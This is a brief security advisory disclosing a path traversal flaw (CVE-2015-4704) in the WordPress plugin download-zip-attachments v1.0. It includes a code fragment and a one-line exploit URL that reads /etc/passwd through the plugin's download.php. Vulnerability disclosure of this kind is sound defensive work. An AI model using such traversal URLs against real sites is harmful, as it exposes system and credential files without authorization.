VDB-ID: 129 Title: Remote file download vulnerability in download-zip-attachments v1.0 Vulnerability Date: 2015-06-10 Download: https://wordpress.org/plugins/download-zip-attachments/ Vendor: rivenvirus Notified: 2015-06-15 Vendor Contact: https://profiles.wordpress.org/rivenvirus/ Description: Download all attachments from the post into a zip file. Vulnerability: from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory. forceDownload($tmp_location,false); unlink($tmp_location); exit; } CVE-IDs: 2015-4704 Exploit: http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd URL: http://www.vapid.dhs.org/advisory.php?v=129 Credit: Larry W. Cashdollar, @_larry0